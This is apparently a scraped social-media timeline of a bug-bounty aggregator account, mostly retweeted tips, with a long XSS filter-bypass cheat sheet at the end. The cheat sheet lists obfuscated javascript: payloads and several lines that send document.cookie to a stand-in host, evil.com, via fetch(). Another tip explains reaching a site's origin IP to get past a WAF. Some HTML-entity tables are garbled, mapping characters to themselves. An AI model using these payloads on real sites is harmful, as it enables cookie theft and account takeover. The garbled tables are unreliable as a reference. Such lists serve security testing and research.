The Bug Bot 리트윗함
Authorization bypass due to cache misconfiguration
(For more join on discord : discord.gg/Y467qAFM4X) #bugbounty #bugbountytips #bugbountytip
rikeshbaniya.medium.com/authorization-…
credit:rikeshbaniya
English
The Bug Bot
23.2K posts
The Bug Bot
@TheBugBot
I was sitting alone, lost, in a park. @CircleNinja saw me one day, hired me and that's how I am here full time working at your service. 🤖
가입일 Haziran 2018
1 팔로잉2.1K 팔로워
The Bug Bot 리트윗함
Detect Sitecore RCE (CVE-2024-46938) with Nuclei 🚀
🔹 Nuclei Template: cloud.projectdiscovery.io/?template=CVE-… by @DhiyaneshDK
🔹 Research: assetnote.io/resources/rese… by @assetnote
#hackwithautomation #Cybersecurity #AppSec #BugBounty
English
The Bug Bot 리트윗함
Nuclei Template : REFLECTION
Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
nuclei -t reflection[.]yaml -u target
#bugbountytips #bugbounty
English
The Bug Bot 리트윗함
The Bug Bot 리트윗함
The Bug Bot 리트윗함
The Bug Bot 리트윗함
XSS WAF Bypass, One payload to rule them all, a nice read from @0xEdra 🔥
onetest.fr/posts/xss-waf-…
English
The Bug Bot 리트윗함
Benefits of jump over the firewalls :)
Use censys.io for finding hidden domain IPs and and try to open the website in the browser with only IP address (1.11.111.1111.11) this time WAF not restrict the request
#bugcrowd #bugbountytips #BugBounty
English
The Bug Bot 리트윗함
English
The Bug Bot 리트윗함
XSS-Bypass-Filters😎
Redirection
document.location=
document['location']=
window.location=
this["window"]["location"]=
document.location.href=
location.href=
location=
window.location.assign()
window['location']['href']=
document.location.replace()
window.open("link", "_blank");
Link
//google.com/?=a
//134744072:1234/?a= (decimal ip)
Cookies
document.cookie
document['cookie']
with(document)alert(cookie)
doc\u0075ment.cookie
doc\u0075ment['cookie']
window["doc"+"ument"]["cookie"]
Concat
fetch("//evil.com/?c="+document.cookie)
fetch("//evil.com/?c=".concat(document.cookie))
fetch("//evil.com/?c=", document.cookie].join())
fetch(`//evil.com/?c=${document.cookie}`)
Href
javascript:alert(1)
JaVaScript:alert(1)
ja vascript:alert(1)
java\tscript:alert(1)
ja
vascript:alert(1)
ja
vascript:alert(1)
javascript:alert()
javascript:alert('XSS')
# tab (0x9), newline (0xa) and carriage return (0xd) allowed (inside or after the protocol)
ja
vascript:alert(1) # New line
javascript:alert(1) # Tab
# Special Characters before the protocol (Raw or encode)
# \x01-\x20 are allowed - Somes Example :
unicode-symbol.com/u/0017.html
unicode-symbol.com/u/0008.html
javascript:alert('Successful XSS') # ETB HTML
javascript:alert(1) # Backspace HTML
# colon
javascript:alert()
javascript:alert()
javascript:alert(1)
javascript:alert()
# javascript://
javascript://%0Aalert(1)
javascript://%0Dalert(1)
# target="_blank"
- Scroll Click
- Shift + Click
- Ctrl + Click
# alert
javascript:alert()
javascript:alert``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
HTML ENTITY
Named entities
#recipe=To_HTML_Entity(false,'Named%20entities')" target="_blank" rel="nofollow noopener">gchq.github.io/CyberChef/#rec…
' -> '
" -> "
` -> `
` -> `
( -> (
) -> )
{ -> {
} -> }
& -> &
< -> <
> -> >
\n ->
\t ->
nbsp ->
\ -> \
Hex entities
[#recipe=To_HTML_Entity(false,'Hex%20entities')" target="_blank" rel="nofollow noopener">gchq.github.io/CyberChef/#rec…
' -> '
" -> "
` -> `
( -> (
{ -> {
} -> }
& -> &
< -> <
> -> >
\n -> 

\t -> 	
nbsp ->  
\ -> \
Numeric entities
#recipe=To_HTML_Entity(false,'Numeric%20entities')" target="_blank" rel="nofollow noopener">gchq.github.io/CyberChef/#rec…
' -> '
" -> "
` -> `
( -> (
) -> )
{ -> {
} -> }
& -> &
< -> <
> -> >
\n ->
\t -> 	
nbsp ->  
\ -> \
Numeric and Hex you can add as many 0
( -> ( = (
( -> ( = (
Email
test+()@example.com
test@example().com
""@example.com
Iframe